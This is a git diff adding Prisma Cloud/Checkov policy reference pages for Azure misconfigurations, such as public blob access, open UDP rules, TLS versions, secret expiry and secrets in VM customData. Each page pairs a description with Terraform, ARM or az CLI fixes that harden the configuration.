+ + enable_https_traffic_only = true + }", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-storage-accounts-disallow-public-access.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-storage-accounts-disallow-public-access.adoc new file mode 100644 index 000000000..f3411f33c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-storage-accounts-disallow-public-access.adoc @@ -0,0 +1,83 @@ +== Azure storage account does allow public access +// Azure storage account allows public access + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8409051e-b72e-4e3e-b144-feea51984e64 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py[CKV_AZURE_59] + +|Severity +|LOW + +|Subtype +|Build +// ,Run +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +As a best practice, do not allow anonymous/public access to blob containers unless you have a very good reason. +Instead, you should consider using a shared access signature token for providing controlled and time-limited access to blob containers. 'Public access level' allows you to grant anonymous/public read access to a container and the blobs within Azure blob storage. + +By doing so, you can grant read-only access to these resources without sharing your account key, and without requiring a shared access signature. + +//// +=== Fix - Runtime + + +* In Azure Console* + + + +. Log in to the Azure portal + +. Navigate to 'Storage Accounts' + +. Select the reported storage account + +. Under 'Blob service' section, Select 'Containers' + +. Select the blob container you need to modify + +. Click on 'Change access level' + +. Set 'Public access level' to 'Private (no anonymous access)' + +. 
Click on 'OK'
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_storage_account
+* *Arguments:* allow_blob_public_access
+
+
+[source,go]
+----
+resource "azurerm_storage_account" "example" {
+ ...
++ allow_blob_public_access = false
+ ...
+}
+----
+
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-udp-services-are-restricted-from-the-internet.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-udp-services-are-restricted-from-the-internet.adoc
new file mode 100644
index 000000000..8771acf80
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/ensure-that-udp-services-are-restricted-from-the-internet.adoc
@@ -0,0 +1,65 @@
+== Azure Network Security Group having Inbound rule overly permissive to all traffic on UDP protocol
+// Azure Network Security Group with overly permissive inbound rule to all traffic on UDP protocol
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| d979e854-a50d-11e8-98d0-529269fb1459
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py[CKV_AZURE_77]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform, TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Disable Internet-exposed UDP ports on network security groups.
+The potential security problem with broadly exposing UDP services over the Internet is that attackers can use DDoS amplification techniques to reflect spoofed UDP traffic from Azure Virtual Machines.
+The most common types of these attacks use exposed DNS, NTP, SSDP, SNMP, CLDAP and other UDP-based services as an amplification source for disrupting services of other machines on the Azure Virtual Network, or even to attack networked devices outside of Azure.
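The condition this check evaluates can be sketched in plain Python over a simplified view of NSG security rules. This is an illustrative approximation only, not Checkov's actual implementation; the dictionary shape and the set of "any source" prefixes are assumptions made for the example.

```python
# Illustrative sketch: flag NSG security rules that allow inbound UDP traffic
# from any source. The rule-dict shape is an assumption, not Checkov's real
# internal representation.
def overly_permissive_udp_rules(rules):
    flagged = []
    for rule in rules:
        if (rule.get("direction") == "Inbound"
                and rule.get("access") == "Allow"
                and rule.get("protocol", "").lower() in ("udp", "*")
                and rule.get("source_address_prefix") in ("*", "0.0.0.0/0", "Internet", "Any")):
            flagged.append(rule["name"])
    return flagged

rules = [
    {"name": "allow-any-udp", "direction": "Inbound", "access": "Allow",
     "protocol": "Udp", "source_address_prefix": "*"},
    {"name": "deny-udp", "direction": "Inbound", "access": "Deny",
     "protocol": "Udp", "source_address_prefix": "*"},
]
print(overly_permissive_udp_rules(rules))  # ['allow-any-udp']
```

Setting either `access = "Deny"` or a restrictive source prefix is enough to clear the condition, which is what the Terraform fix below does.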
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_network_security_group +* *Arguments:* protocol + + +[source,go] +---- +resource "azurerm_network_security_group" "example" { + + security_rule { + name = "test123" + priority = 100 + direction = "Inbound" ++ access = "Deny" ++ protocol = "Udp" + source_port_range = "*" + destination_port_range = "*" + source_address_prefix = "*" + destination_address_prefix = "*" + } + ... + } +---- + diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/set-default-network-access-rule-for-storage-accounts-to-deny.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/set-default-network-access-rule-for-storage-accounts-to-deny.adoc new file mode 100644 index 000000000..ef2f51e0a --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/set-default-network-access-rule-for-storage-accounts-to-deny.adoc @@ -0,0 +1,125 @@ +== Azure Storage Account default network access is set to 'Allow' +// Azure Storage Account default network access set to 'Allow' + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 991aca47-286f-45be-8737-ff9c069beab6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py[CKV_AZURE_35] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + + + +=== Description + + +Restricting default network access helps to provide an additional layer of security. +By default, storage accounts accept connections from clients on any network. +To limit access to selected networks, the default action must be changed. +We recommend you configure storage accounts to *deny* access to traffic from all networks, including internet traffic. 
+At an appropriate time, access can be granted to traffic from specific Azure Virtual networks, allowing a secure network boundary for specific applications to be built. +Access can also be granted to public internet IP address ranges enabling connections from specific internet or on-premises clients. +When network rules are configured only applications from allowed networks can access a storage account. +When calling from an allowed network applications continue to require authorization, such as a valid access key or SAS token, to access the storage account. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * Storage Accounts*. + +. For each storage account: a) Navigate to * Settings* menu. ++ +b) Click * Firewalls and virtual networks*. ++ +c) For selected networks, select * Allow access*. ++ +d) Add rules to allow traffic from specific network. ++ +e) To apply changes,click * Save*. 
+
+
+*CLI Command*
+
+
+To update *default-action* to *Deny*, use the following command:
+----
+az storage account update
+--name <StorageAccountName>
+--resource-group <resourceGroupName>
+--default-action Deny
+----
+////
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_storage_account_network_rules
+* *Arguments:* default_action
+
+
+[source,go]
+----
+resource "azurerm_storage_account_network_rules" "test" {
+  resource_group_name  = azurerm_resource_group.test.name
+  storage_account_name = azurerm_storage_account.test.name
+
++ default_action = "Deny"
+}
+----
+
+In a Storage Account:
+
+
+[source,go]
+----
+resource "azurerm_storage_account" "test" {
+  name                = var.watcher
+  resource_group_name = azurerm_resource_group.test.name
+  location            = azurerm_resource_group.test.location
+
++ network_rules {
++   default_action = "Deny"
++ }
+
+  account_tier              = "Standard"
+  account_kind              = "StorageV2"
+  account_replication_type  = "LRS"
+  enable_https_traffic_only = true
+}
+----
+
+*Suppression Advice*
+
+This can trigger incorrectly on _azurerm_storage_account_ when using correctly configured _azurerm_storage_account_network_rules_. If this occurs, suppression is reasonable.
diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/set-public-access-level-to-private-for-blob-containers.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/set-public-access-level-to-private-for-blob-containers.adoc
new file mode 100644
index 000000000..7b5f4de2c
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-networking-policies/set-public-access-level-to-private-for-blob-containers.adoc
@@ -0,0 +1,117 @@
+== Azure storage account has a blob container that is publicly accessible
+// Azure storage account has a publicly accessible blob container
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| e0b894ba-b341-4730-b7c6-0f8234f2ce8f
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py[CKV_AZURE_34]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|ARM, Terraform, Bicep, TerraformPlan
+
+|===
+
+=== Description
+
+
+Anonymous, public read access to a container and its blobs can be enabled in Azure Blob storage.
+It grants read-only access to these resources without sharing the account key or requiring a shared access signature.
+We recommend you do not provide anonymous access to blob containers unless it is strictly required.
+A shared access signature token should be used to provide controlled, time-limited access to blob containers.
+
+////
+=== Fix - Runtime
+
+
+*Azure Portal: To begin, follow Microsoft documentation and create shared access signature tokens for your blob containers.*
+
+
+When complete, change the policy using the Azure Portal to deny anonymous access following these steps:
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. Navigate to *Storage Accounts*.
+
+. For each storage account: a) Navigate to *BLOB SERVICE*.
++
+b) Select *Containers*.
++
+c) For each *Container*: (i) Click *Access policy*.
++
+(ii) Set *Public Access Level* to *Private*.
+
+
+*CLI Command*
+
+
+To set the permission for public access to private (off) for a specific blob container, use the container's name with the following command:
+----
+az storage container set-permission
+--name <containerName>
+--public-access off
+--account-name <accountName>
+--account-key <accountKey>
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_storage_container
+* *Arguments:* container_access_type
+
+
+[source,go]
+----
+resource "azurerm_storage_container" "example" {
+ ...
++ container_access_type = "private" +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-policies.adoc b/code-security/policy-reference/azure-policies/azure-policies.adoc new file mode 100644 index 000000000..0b6c6a837 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-policies.adoc @@ -0,0 +1,3 @@ +== Azure Policies + + diff --git a/code-security/policy-reference/azure-policies/azure-secrets-policies/azure-secrets-policies.adoc b/code-security/policy-reference/azure-policies/azure-secrets-policies/azure-secrets-policies.adoc new file mode 100644 index 000000000..987c2141e --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-secrets-policies/azure-secrets-policies.adoc @@ -0,0 +1,19 @@ +== Azure Secrets Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-azr-secrets-2.adoc[Secrets are exposed in Azure VM customData] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py[CKV_AZURE_45] +|HIGH + + +|xref:set-an-expiration-date-on-all-secrets.adoc[Azure Key Vault secrets does not have expiration date] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecretExpirationDate.py[CKV_AZURE_41] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/azure-policies/azure-secrets-policies/bc-azr-secrets-2.adoc b/code-security/policy-reference/azure-policies/azure-secrets-policies/bc-azr-secrets-2.adoc new file mode 100644 index 000000000..d21d23534 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-secrets-policies/bc-azr-secrets-2.adoc @@ -0,0 +1,95 @@ +== Secrets are exposed in Azure VM customData +// Secrets exposed in Azure VM customData + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b006d03f-1272-4de1-ba20-106ef7c09109 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py[CKV_AZURE_45] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform, TerraformPlan + +|=== +//// +Bridgecrew +Prisma Cloud +*Secrets are exposed in Azure VM customData* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b006d03f-1272-4de1-ba20-106ef7c09109 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMCredsInCustomData.py[CKV_AZURE_45] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +The Azure VM metadata field *customData* allows custom code to run right after the VM is launched. +It contains code that is exposed to any entity with even the most basic access to the VM, including read-only access to its configuration. +The code is not encrypted. +We recommend you use Azure Key Vault to access secrets from the VM. +Removing secrets from easily accessed, unencrypted locations reduces the risk of exposing passwords, private keys, and other sensitive data to third parties. +//// +=== Fix - Runtime +A Runtime Remediation is not applicable in this case because custom data cannot be modified on an existing VM. +A new VM must be created with different custom data. +//// +=== Fix - Buildtime + + +*Terraform* + + +Remove the following attribute from the Terraform resource. + + +[source,go] +---- +resource "azurerm_virtual_machine" "main" { + name = "${var.prefix}-vm" + ... + os_profile { + ... +- custom_data = "MY_SECRET_VALUE" + } + + ... +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-secrets-policies/set-an-expiration-date-on-all-secrets.adoc b/code-security/policy-reference/azure-policies/azure-secrets-policies/set-an-expiration-date-on-all-secrets.adoc new file mode 100644 index 000000000..637411416 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-secrets-policies/set-an-expiration-date-on-all-secrets.adoc @@ -0,0 +1,117 @@ +== Azure Key Vault secrets does not have expiration date +// Azure Key Vault secrets do not have expiration dates + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f75c8a06-27af-4588-8e30-dd25f3be2c20 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecretExpirationDate.py[CKV_AZURE_41] + +|Severity +|HIGH + +|Subtype +|Build +// ,Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +*Azure Key Vault secrets does not have expiration date* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f75c8a06-27af-4588-8e30-dd25f3be2c20 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecretExpirationDate.py[CKV_AZURE_41] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== +//// + + +=== Description + + +The Azure Key Vault (AKV) enables users to store and keep secrets within the Microsoft Azure environment. +Secrets in the AKV are octet sequences with a maximum size of 25k bytes each. +The exp (expiration time) attribute identifies the expiration time on or after which the secret must not be used. +By default, secrets do not expire. +We recommend you rotate secrets in the key vault and set an explicit expiration time for all secrets. +This ensures that the secrets cannot be used beyond their assigned lifetimes.
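The expiration time takes the form of an RFC 3339 UTC timestamp (for example, `2020-12-30T20:00:00Z`, the format used by the azurerm `expiration_date` argument). A minimal sketch of generating such a value in Python, assuming a 90-day rotation window (the lifetime is illustrative, not mandated by the check):

```python
# Sketch: build an RFC 3339 UTC timestamp suitable for a Key Vault secret
# expiration. The 90-day default lifetime is an assumed rotation policy.
from datetime import datetime, timedelta, timezone

def secret_expiration(days: int = 90) -> str:
    """Return a UTC expiration timestamp `days` from now, e.g. '2020-12-30T20:00:00Z'."""
    expires = datetime.now(timezone.utc) + timedelta(days=days)
    return expires.strftime("%Y-%m-%dT%H:%M:%SZ")

print(secret_expiration())
```

Because the format is fixed-width with fields in descending significance, these strings also sort chronologically, which makes stale-secret checks a simple string comparison.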
+//// +=== Fix - Runtime + + +*Azure Portal*: To change the policy using the Azure Portal, follow these steps: + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to *Key vaults*. + +. For each Key vault: a) Click *Secrets*. ++ +b) Navigate to *Settings*. ++ +c) Set *Enabled?* to *Yes*. ++ +d) Set an appropriate *EXPIRATION DATE* on all secrets. + + +*CLI Command* + + +To set an *EXPIRATION DATE* on all secrets, use the following command: +---- +az keyvault secret set-attributes +--name <secretName> +--vault-name <vaultName> +--expires Y-m-d'T'H:M:S'Z' +---- +//// + +=== Fix - Buildtime + +*Terraform* + + +* *Resource:* azurerm_key_vault_secret +* *Arguments:* expiration_date + + +[source,go] +---- +resource "azurerm_key_vault_secret" "example" { + ... + + expiration_date = "2020-12-30T20:00:00Z" +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-storage-policies/azure-storage-policies.adoc b/code-security/policy-reference/azure-policies/azure-storage-policies/azure-storage-policies.adoc new file mode 100644 index 000000000..f1e90a7f2 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-storage-policies/azure-storage-policies.adoc @@ -0,0 +1,24 @@ +== Azure Storage Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-azr-storage-2.adoc[Azure Storage Account using insecure TLS version] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py[CKV_AZURE_44] +|MEDIUM + + +|xref:bc-azr-storage-4.adoc[Azure Cosmos DB key based authentication is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py[CKV_AZURE_132] +|MEDIUM + + +|xref:ensure-storage-accounts-adhere-to-the-naming-rules.adoc[Storage Account name does not follow naming rules] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountName.py[CKV_AZURE_43] +|LOW + + +|=== + diff --git a/code-security/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-2.adoc b/code-security/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-2.adoc new file mode 100644 index 000000000..4a8935952 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-2.adoc @@ -0,0 +1,158 @@ +== Azure Storage Account using insecure TLS version +// Azure Storage Account uses insecure version of TLS + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 91389569-c060-44e0-9aef-f13dba594f3c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountMinimumTlsVersion.py[CKV_AZURE_44] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +Communication between a client application and an Azure Storage account is encrypted using Transport Layer Security (TLS). +TLS is a standard cryptographic protocol that ensures privacy and data integrity between clients and services over the Internet. +Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. +Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. +To follow security best practices and the latest PCI compliance standards, Microsoft recommends enabling the latest version of TLS protocol (TLS 1.2) for all your Microsoft Azure App Service web applications. +The PCI DSS information security standard requires that all websites accepting credit card payments use TLS 1.2 after June 30, 2018. +//// +=== Fix - Runtime + + +*Azure Portal*: To change the policy using the Azure Portal, follow these steps: + + + +. 
Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to your *storage account*. + +. Select *Configuration*. + +. Under *Minimum TLS version*, use the drop-down to select the minimum version of TLS required to access data in this storage account, as shown in the following image. + + +*CLI Command* + + +The minimumTlsVersion property is not set by default when you create a storage account with Azure CLI. +This property does not return a value until you explicitly set it. +The storage account permits requests sent with TLS version 1.0 or greater if the property value is null. + + +[source,shell] +---- +az storage account create \ +  --name <storage-account> \ +  --resource-group <resource-group> \ +  --kind StorageV2 \ +  --location <location> \ +  --min-tls-version TLS1_1 + +az storage account show \ +  --name <storage-account> \ +  --resource-group <resource-group> \ +  --query minimumTlsVersion \ +  --output tsv + +az storage account update \ +  --name <storage-account> \ +  --resource-group <resource-group> \ +  --min-tls-version TLS1_2 + +az storage account show \ +  --name <storage-account> \ +  --resource-group <resource-group> \ +  --query minimumTlsVersion \ +  --output tsv +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_account +* *Attribute:* min_tls_version (Optional) The minimum supported TLS version for the storage account. + +Possible values are TLS1_0, TLS1_1, and TLS1_2. +Defaults to TLS1_0 for new storage accounts. +Use TLS1_2. + + +[source,go] +---- +resource "azurerm_storage_account" "test" { + ... ++ min_tls_version = "TLS1_2" + ... +} +---- + + +*ARM Template* + + +* *Resource:* Microsoft.Storage/storageAccounts +* *Arguments:* minimumTlsVersion + +To configure the minimum TLS version for a storage account with a template, create a template with the minimumTlsVersion property set to TLS1_0, TLS1_1, or TLS1_2.
+ + +[source,go] +---- +{ + "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": {}, + "variables": { + "storageAccountName": "[concat(uniqueString(subscription().subscriptionId), 'tls')]" + }, + "resources": [ + { + "name": "[variables('storageAccountName')]", + "type": "Microsoft.Storage/storageAccounts", + "apiVersion": "2019-06-01", + "location": "", + "properties": { + "minimumTlsVersion": "TLS1_2" + }, + "dependsOn": [], + "sku": { + "name": "Standard_GRS" + }, + "kind": "StorageV2", + "tags": {} + } + ] +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-4.adoc b/code-security/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-4.adoc new file mode 100644 index 000000000..af37d3647 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-storage-policies/bc-azr-storage-4.adoc @@ -0,0 +1,117 @@ +== Azure Cosmos DB key based authentication is enabled +// Azure Cosmos DB key based authentication enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8fc7b6c0-d6c2-4f29-ad98-d837e7a74ec7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py[CKV_AZURE_132] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM, Terraform, Bicep, TerraformPlan + +|=== +//// +Bridgecrew +Prisma Cloud +*Azure Cosmos DB key based authentication is enabled* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8fc7b6c0-d6c2-4f29-ad98-d837e7a74ec7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py[CKV_AZURE_132] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== +//// + 
+ +=== Description + + +In 2019, Microsoft added a feature called Jupyter Notebook to Cosmos DB that lets customers visualize their data and create customized views. +The feature was automatically turned on for all Cosmos DBs in February 2021. +A series of misconfigurations in the notebook feature opened up a new attack vector - the notebook container allowed for a privilege escalation into other customer notebooks. +As a result, an attacker could gain access to customers`' Cosmos DB primary keys and other highly sensitive secrets such as the notebook blob storage access token. +For more details, see https://msrc-blog.microsoft.com/2021/08/27/update-on-vulnerability-in-the-azure-cosmos-db-jupyter-notebook-feature/ +One way to reduce risk is to prevent management plane changes for clients using key based authentication. +Cosmos DB access keys are mainly used by applications to access data in Cosmos DB containers. +It is rare for organizations to have use cases where the keys are used to make management changes. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_cosmosdb_account +* *Arguments:* access_key_metadata_writes_enabled + + +[source,go] +---- +resource "azurerm_cosmosdb_account" "db" { + name = "db" + ... ++ access_key_metadata_writes_enabled = false +} +---- + + + +*ARM Templates* + + +* *Resource:* Microsoft.DocumentDB/databaseAccounts +* *Arguments:* disableKeyBasedMetadataWriteAccess + + +[source,go] +---- +{ + "$schema": "https://schema.management.azure.com/schemas/2018-05-01/subscriptionDeploymentTemplate.json#", + "contentVersion": "1.0.0.0", + ... + "resources": [ + { + "type": "Microsoft.DocumentDB/databaseAccounts", + "apiVersion": "2018-07-01", + "name": "db", + "properties": { + ... 
++ "disableKeyBasedMetadataWriteAccess": true, + } + } + ] +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-storage-policies/ensure-storage-accounts-adhere-to-the-naming-rules.adoc b/code-security/policy-reference/azure-policies/azure-storage-policies/ensure-storage-accounts-adhere-to-the-naming-rules.adoc new file mode 100644 index 000000000..30aeaf883 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-storage-policies/ensure-storage-accounts-adhere-to-the-naming-rules.adoc @@ -0,0 +1,58 @@ +== Storage Account name does not follow naming rules +// Azure Storage Account name does not follow naming rules + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f06c6dbe-be9e-4966-b9ac-18fbe7f016c0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountName.py[CKV_AZURE_43] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +Azure has the following https://docs.microsoft.com/en-us/azure/storage/common/storage-account-overview#naming-storage-accounts[rules for naming] your storage account: + +* Names must be between 3 and 24 characters long +* Names may contain numbers and lowercase letters only +* Your storage account name must be unique + +This policy ensures that you have not provided an invalid name for your Storage Account. 
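The naming rules above reduce to a single pattern check (3 to 24 characters, lowercase letters and digits only). As a quick local sanity check, they can be sketched in Python; the helper name is hypothetical, not part of the Checkov policy, and global uniqueness can only be verified against Azure itself:

```python
# Sketch: Azure storage-account naming rules as a local validation helper.
# Hypothetical helper, not part of the Checkov check.
import re

# 3-24 characters, lowercase letters and digits only.
_NAME_RE = re.compile(r"[a-z0-9]{3,24}")

def is_valid_storage_account_name(name: str) -> bool:
    """Return True if `name` satisfies Azure's storage-account naming rules.

    Global uniqueness is not checked here; only Azure can verify that.
    """
    return _NAME_RE.fullmatch(name) is not None

print(is_valid_storage_account_name("this-Is-Wrong"))  # False: hyphens, uppercase
print(is_valid_storage_account_name("thisisright"))    # True
```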
+ +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +resource "azurerm_storage_account" "camel_case" { +- name = "this-Is-Wrong" ++ name = "thisisright" +} +---- + diff --git a/code-security/policy-reference/azure-policies/public-policies-1/bc-azr-public-1.adoc b/code-security/policy-reference/azure-policies/public-policies-1/bc-azr-public-1.adoc new file mode 100644 index 000000000..7103ea968 --- /dev/null +++ b/code-security/policy-reference/azure-policies/public-policies-1/bc-azr-public-1.adoc @@ -0,0 +1,57 @@ +== MariaDB servers do not have public network access enabled set to False +// Azure MariaDB servers public network access enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c9a786ca-5dc6-4a66-a303-3f9c0a863b52 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py[CKV_AZURE_48] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +It is generally a good security practice to ensure that your MariaDB servers do not have public network access enabled, as this means that they are only accessible from within your private network. +This can help to protect your database servers from unauthorized access, as external parties will not be able to connect to them over the internet. +It is especially important to ensure that public network access is disabled if your MariaDB servers contain sensitive or confidential data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mariadb_server +* *Arguments:* Set public_network_access_enabled to false. + + +[source,go] +---- +resource "azurerm_mariadb_server" "example" { + ... ++ public_network_access_enabled = false +} +---- + diff --git a/code-security/policy-reference/azure-policies/public-policies-1/public-policies-1.adoc b/code-security/policy-reference/azure-policies/public-policies-1/public-policies-1.adoc new file mode 100644 index 000000000..a6eeba7c1 --- /dev/null +++ b/code-security/policy-reference/azure-policies/public-policies-1/public-policies-1.adoc @@ -0,0 +1,14 @@ +== Public Policies 1 + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-azr-public-1.adoc[MariaDB servers do not have public network access enabled set to False] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MariaDBPublicAccessDisabled.py[CKV_AZURE_48] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/book.yml b/code-security/policy-reference/book.yml new file mode 100644 index 000000000..b16e75a21 --- /dev/null +++ b/code-security/policy-reference/book.yml @@ -0,0 +1,2166 @@ +# The ordering of the records in this document determines the ordering of the +# topic groups and topics. 
+--- +kind: book +title: Prisma Cloud Code Security Policy Reference +version: 1.0.0 +author: Prisma Cloud Team +ditamap: prisma-cloud-code-security-policy-reference +dita: techdocs/en_US/dita/test/prisma/prisma-cloud-policy-reference +--- +kind: chapter +name: Get Started with Prisma Cloud Code Security Policies +dir: get-started-code-sec-policies +topics: +- name: Prisma Cloud Code Security Policy Reference + file: get-started-code-sec-policies.adoc +--- +kind: chapter +name: Alibaba Policies +dir: alibaba-policies +topics: +- name: Alibaba Policies + file: alibaba-policies.adoc +- name: Alibaba General Policies + dir: alibaba-general-policies + topics: + - name: Alibaba General Policies + file: alibaba-general-policies.adoc + - name: Alibaba Cloud database instance accessible to public + file: ensure-alibaba-cloud-database-instance-is-not-public.adoc + - name: Alibaba Cloud Disk is not encrypted with Customer Master Key + file: ensure-alibaba-cloud-disk-is-encrypted-with-customer-master-key.adoc + - name: Alibaba Cloud disk encryption is disabled + file: ensure-alibaba-cloud-disk-is-encrypted.adoc + - name: Alibaba Cloud KMS Key Rotation is disabled + file: ensure-alibaba-cloud-kms-key-rotation-is-enabled.adoc + - name: Alibaba Cloud MongoDB does not have transparent data encryption enabled + file: ensure-alibaba-cloud-mongodb-has-transparent-data-encryption-enabled.adoc + - name: Alibaba Cloud OSS bucket has transfer Acceleration disabled + file: ensure-alibaba-cloud-oss-bucket-has-transfer-acceleration-disabled.adoc + - name: Alibaba Cloud OSS 